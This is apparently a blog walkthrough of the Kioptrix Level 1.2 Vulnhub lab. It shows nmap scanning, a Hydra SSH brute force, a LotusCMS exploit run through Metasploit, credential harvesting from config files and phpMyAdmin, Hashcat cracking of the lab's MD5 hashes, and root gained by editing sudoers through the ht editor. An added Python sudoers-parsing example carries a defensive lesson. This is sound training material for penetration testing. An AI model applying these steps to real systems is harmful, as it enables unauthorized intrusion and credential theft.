Kioptrix Level 1.2 (#3)

Vulnhub virtual machine. On the path to OSCP, this box offered web-application testing with Metasploit, phpMyAdmin credential enumeration, cracking hashes with Hashcat, and an interesting priv-esc that involved modifying the sudoers file.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have expressed written permission to test. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


netdiscover -r


Nmap Scanning

nmap -sV -sC -oA nmap/kio3

Navigating to http-server on port 80

searchsploit for web application

searchsploit lingoat

nothing of note turned up.

Checking out the source of web-application

Looks to be based on PHP, with pages loaded through index.php?page=index.

We have a username, loneferret, who was mentioned in a post in the blog section. Next, try to brute-force SSH with that username.

Hydra Bruteforcing SSH

hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt ssh -t 4

Important: use *-t 4* to limit parallel connections; overloading the SSH server can cause connections to drop, which means some passwords are never actually tested.

Brute forcing inside a VM is... well, terrible.

Login page

searchsploit LotusCMS

interesting find

Viewing how the Metasploit module works

The module manipulates the page parameter (the same index.php?page= seen earlier) rather than requesting the default page, which is worth investigating.

Remote Code Execution

Run Metasploit and search for lotuscms

msfdb run

This starts the PostgreSQL database and the required files, then launches msfconsole.

We have achieved an easy shell.

getuid shows the current user; sysinfo shows system information.

capture /etc/passwd

cat /etc/passwd

This confirms that the user loneferret exists.

Search for any type of config files

search -d /home/www/ -f *config*

Investigating config files

cat /home/www/

phpMyAdmin user/password discovered!

Login to phpMyAdmin, navigate to

access granted

Navigating through the MySQL server to the Gallery database, the dev_accounts table was discovered.

Hashes captured

dreg: 0d3eccfb887aabd50f243b3f155c0f85
loneferret: 5badcaf789d3d1d09794d8f021f40f0e

Determining type of hash


Both hashes are 32 hexadecimal characters, so unsalted MD5 looks like a likely match (Hashcat mode 0).

Cracking Hashes with Hashcat: add the hashes to hash.txt, one per line. Put only the hash on each line; if you keep the user:hash form from the database, pass --username to Hashcat or it will reject the lines.

Launch Hashcat

hashcat -m 0 -a 0 hash.txt rockyou.txt -o cracked.txt

Hashes successfully cracked.

dreg       - 0d3eccfb887aabd50f243b3f155c0f85: starwars
loneferret - 5badcaf789d3d1d09794d8f021f40f0e: Mast3r

Connect to SSH

Perform a quick sudo -l to determine what we can su-DO. (joke complimentary)


execute sudo ht

sudo ht

After playing around, I discovered that *ALT+F* opens the menu used to move around in the application; from there the sudoers file can be opened for editing.

Modifying the sudoers file

Add /bin/sh to loneferret's entry and save the file.


sudo /bin/sh
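To show why appending /bin/sh to loneferret's line hands over a root shell, here is an added example (not from the original post) with a minimal parser for the simple sudoers form `user HOST=(RUNAS) [NOPASSWD:] cmd1, cmd2, !cmd3`. It goes slightly beyond the page by also handling `ALL` and `!` exclusions. Aliases, wildcards and Defaults lines are out of scope. The entries are constructed: the page does not print the real `sudo -l` output, and the `/usr/local/bin/ht` path is an assumption.

```python
"""Minimal sudoers-entry check: before and after adding /bin/sh (added example)."""
import re

# user  host = (runas)  [NOPASSWD:] cmd, cmd, !cmd
LINE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_entry(line):
    """Parse one user specification line into its parts."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unsupported sudoers line: {line!r}")
    cmds = m.group("cmds")
    nopasswd = cmds.startswith("NOPASSWD:")
    if nopasswd:
        cmds = cmds[len("NOPASSWD:"):]
    allowed, denied = set(), set()
    for c in (x.strip() for x in cmds.split(",")):
        if c.startswith("!"):
            denied.add(c[1:])
        elif c:
            allowed.add(c)
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",
        "nopasswd": nopasswd,
        "allowed": allowed,
        "denied": denied,
    }


def can_run(entry, user, command):
    """True if `user` may run `command` under this entry.

    ALL matches any command; an explicit !cmd wins over ALL, as in sudoers.
    """
    if entry["user"] != user or command in entry["denied"]:
        return False
    return "ALL" in entry["allowed"] or command in entry["allowed"]


def add_command(line, command):
    """Append a command to the entry's command list (the edit made with sudo ht)."""
    return f"{line.rstrip()}, {command}"


# Constructed entries; the ht path is assumed, not taken from the page.
BEFORE = "loneferret ALL=(root) NOPASSWD: /usr/local/bin/ht"
AFTER = add_command(BEFORE, "/bin/sh")


def main():
    for label, line in (("before", BEFORE), ("after", AFTER)):
        e = parse_entry(line)
        print(f"{label}: {line}")
        print(f"  sudo ht      -> {can_run(e, 'loneferret', '/usr/local/bin/ht')}")
        print(f"  sudo /bin/sh -> {can_run(e, 'loneferret', '/bin/sh')}")


if __name__ == "__main__":
    main()
```

The lesson for the defensive side is the one sudo itself warns about: any editor, pager or interpreter granted through sudo that can open or write arbitrary files is equivalent to granting a root shell, so the allowed command list, not the password prompt, is the real boundary.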

Bring me the root!